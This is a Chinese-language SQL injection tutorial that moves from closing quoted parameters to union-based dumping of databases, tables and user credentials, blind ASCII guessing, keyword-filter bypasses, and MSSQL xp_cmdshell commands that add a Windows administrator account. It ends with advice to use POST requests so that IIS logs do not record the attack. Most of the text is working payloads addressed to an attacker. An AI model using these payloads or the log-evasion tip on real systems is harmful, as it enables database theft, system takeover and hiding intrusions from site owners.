闭合方法
一般来说,程序员在书写select语句时,会对传入的变量进行一些处理,常见的有如下几种,这里以php为例,假设传输进来的变量为‘$id‘’,其他后端语言也相同。
select * from tables where id=$id; #这种情况下,$id变量多为数字型 不需要闭合符号,可以直接注入,但如果系统做了只能传入数字型的判断,就无法注入
select * from tables where id='$id'; #这种情况下,$id变量多为字符型 需要闭合单引号,可以用?id=1'这种形式闭合
select * from tables where id="$id"; #这种情况下,$id变量多为字符型 需要闭合双引号,可以用?id=1"这种形式闭合
select * from tables where id=($id); #这种情况下,$id变量多为数字型 需要闭合括号,可以用?id=1)这种形式闭合
select * from tables where id=('$id'); #这种情况下,$id变量多为字符型 需要同时闭合单引号和括号,可以用?id=1')这种形式闭合
select * from tables where id=("$id"); #这种情况下,$id变量多为字符型 需要同时闭合双引号和括号,可以用?id=1")这种形式闭合
select * from tables where id=(('$id')); #这种情况下,$id变量多为字符型 需要同时闭合单引号和两层括号,可以用?id=1'))这种形式闭合
有些语句还有limit子句,如select * from tables where id='$id' limit 0,1;,我们可以通过上面提到的方法先闭合单引号
然后用%23,即注释符注释掉后面的语句,具体写法如下:?id=1'%23;即可闭合输出正确的语句
手工注入
找到注入点
在变量可控的部分加入一些符号,查看页面是否正常,举个例子:
有这么一个网站www.example.com/index.php?id=1
这里的id变量是用户可控的,可以在id=1后加一个单引号,变成id=1' 。页面如果报错多了一个单引号,那么说明可能存在注入点。
也可以在id=1后通过and符号多增加多个判断,如果‘id=1 and 1=1’页面正常,‘id=1 and 1=2’时页面不正常,则这个页面边可能存在注入。
闭合语句
如果在第一步的数据库报错中出现了limit附近的语法错误,一般来说,原有语句中的这个limit我们是无法利用的,多半可能会导致我们的闭合无法完成,而且为了后续便于我们遍历数据库,我们需要注入一个我们可控的limit子句,所以需要注释掉原有语句的limit子句,防止冲突。可以使用%23(#),--%20 %23这些数据库注释符号,进行注释。举个例子:
有这么一个网站:www.example.com/index.php?id=1
他在数据中的查询语句是select * from table where id='$id' limit 0,1;
那么我们注入的语句就可以是?id=1' %23
这个时候,带入到数据库查询的语句就变成了select * from table where id='$id' #' limit 0,1;
井 会把后面的语句注释掉,然后我们得到实际执行的语句就成了select * from table where id='$id';
使用的%23而不是#呢,因为由于编码的问题,在浏览器中直接提交#会变成空,所以我们使用url编码后的#,即%23,当传输到后端时,后端语言会对它自动解码成#,才能够成功带入数据库查询。
先通过order by 子句判断有几个字段。
payload:?id=1' order by n %23
如果n为3时页面正常,n为4时页面不正常,则可以判断有三个字段。这里就假设我们得到的n为3,继续举例。
通过and 1=2 union select 1,2,3……,n联合查询判断显示字段是哪些
payload:?id=1' and 1=2 union select 1,2,3……n
这里的n为我们上面通过order by n测试出来的那个值,这里我们取3。所以实际注入时就是?id=1' and 1=2 select 1,2,3
提交后,可以看到页面中出现可以被显示的字段编号,我们通过在响应位置替换成我们需要的查询字段和表就可以,如这里,我注入出来的是2和3位置可以被注入,也就是接下来所有注入的内容更都需要替换这里select语句中的2和3
暴出当前库和版本
payload:?id=1' and 1=2 union select 1,database(),version() %23
暴出其他数据库
payload:?id=1' and 1=2 union select 1,schema_name,3 from information_schema.schemata limit 0,1%23
通过调整limit即可遍历出所有的数据库,调整方法为limit 0,1;limit 1,2;limit 2,3……直到出现错误或异常
暴对应数据库的数据表
payload:?id=1' and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=数据库名的十六进制 limit 0,1%23
这里我用当前数据库来做演示,即security库
遍历也是通过调整limit来实现的,方法同上
暴对应数据库、数据表的各个字段
payload:?id=1' and 1=2 union select 1,column_name,3 from information_schema.columns where table_schema=库名十六进制 and table_name=表名十六进制 limit 0,1%23
这里我用security库和security中的users表来做演示
遍历也是通过调整limit来实现的,方法同(4)
暴数据,也就是我们常说的脱库
payload:?id=1' and 1=2 union select 1,字段名,3 from 库名.表名 limit 0,1%23
这里由于2和3位都是可用的,所以我可以在两个位同时显示两个字段。这里选用了security库的users表,我们只关注用户名和密码字段,所以只暴这两个字段即可
遍历也是通过调整limit来实现的,方法同(4)
进 阶 篇
根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:
(A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:
- Select * from 表名 where 字段=49
- 注入的参数为ID=49 And [查询条件],即是生成语句:
- Select * from 表名 where 字段=49 And [查询条件]
(B) Class=连续剧 这类注入的参数是字符型,SQL语句原貌大致概如下:
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ,即是生成语句:
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’
? 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
- Select * from 表名 where 字段like ’%关键字%’
注入的参数为keyword=’ and [查询条件] and ‘%25’=’, 即是生成语句: - Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’
接着,将查询条件替换成SQL语句,猜解表名,例如:
猜表
ID=49 And (Select Count(*) from COLLATIONS)>=0
如果页面就与ID=49的相同,说明附加条件成立,即表COLLATIONS存在,反之,即不存在(请牢记这种方法)。如此循环,直至猜到表名为止。
select * from COLLATIONS where id > 230 and (select count(*) from COLLATIONS)>=197
猜字段
表名猜出来后,将Count(*)替换成Count(字段名),用同样的原理猜解字段名。
猜数据内容
我们举个例子,已知表Admin中存在username字段,首先,我们取第一条记录,测试长度:
[http://www.mytest.com/showdetail.asp?id=49](http://www.mytest.com/showdetail.asp?id=49) ;and (select top 1 len(username) from Admin)>0
先说明原理:如果top 1的username长度大于0,则条件成立;接着就是>1、>2、>3这样测试下去,一直到条件不成立为止,比如>7成立,>8不成立,就是len(username)=8
当然没人会笨得从0,1,2,3一个个测试,怎么样才比较快就看各自发挥了。在得到username的长度后,用mid(username,N,1)截取第N位字符,再asc(mid(username,N,1))得到ASCII码,比如:
id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0
同样也是用逐步缩小范围的方法得到第1位字符的ASCII码,注意的是英文和数字的ASCII码在1-128之间,可以用折半法加速猜解,如果写成程序测试,效率会有极大的提高。
SQL注入常用函数
有SQL语言基础的人,在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平,特别是一些常用的函数及命令。
Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII码
Access:chr(数字) SQLServer:nchar(数字)
作用:与asc相反,根据ASCII码返回字符
Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串
Access:abc(数字) SQLServer:abc (数字)
作用:返回数字的绝对值(在猜解汉字的时候会用到)
Access:A between B And C SQLServer:A between B And C
作用:判断A是否界于B与C之间
截取函数 MID
ASCII码函数 ASCII
高级篇
利用系统表注入SQLServer数据库
SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子:
① [http://site/url.asp?id=1;exec](http://site/url.asp?id=1;exec) master..xp_cmdshell “net user name password /add”--
这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用系统命令,于是,用net命令新建了用户名为name、密码为password的windows的帐号
② [http://site/url.asp?id=1;exec](http://site/url.asp?id=1;exec) master..xp_cmdshell “net localgroup name administrators /add”--
将新建的帐号name加入管理员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的。
③ [http://site/url.asp?id=1](http://site/url.asp?id=1) ;and db_name()>0
绕过程序限制继续注入
简单的如where xtype=’U’,字符U对应的ASCII码是85,所以可以用where xtype=char(85)代替;如果字符是中文的,比如where name=’用户’,可以用where name=nchar(29992)+nchar(25143)代替。
经验小结
- 1.有些人会过滤Select、Update、Delete这些关键字,但偏偏忘记区分大小写,所以大家可以用selecT这样尝试一下。
- 2.在猜不到字段名时,不妨看看网站上的登录表单,一般为了方便起见,字段名都与表单的输入框取相同的名字。
- 3.特别注意:地址栏的+号传入程序后解释为空格,%2B解释为+号,%25解释为%号,具体可以参考URLEncode的相关介绍。
- 4.用Get方法注入时,IIS会记录你所有的提交字符串,对Post方法做则不记录,所以能用Post的网址尽量不用Get。
- 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高。
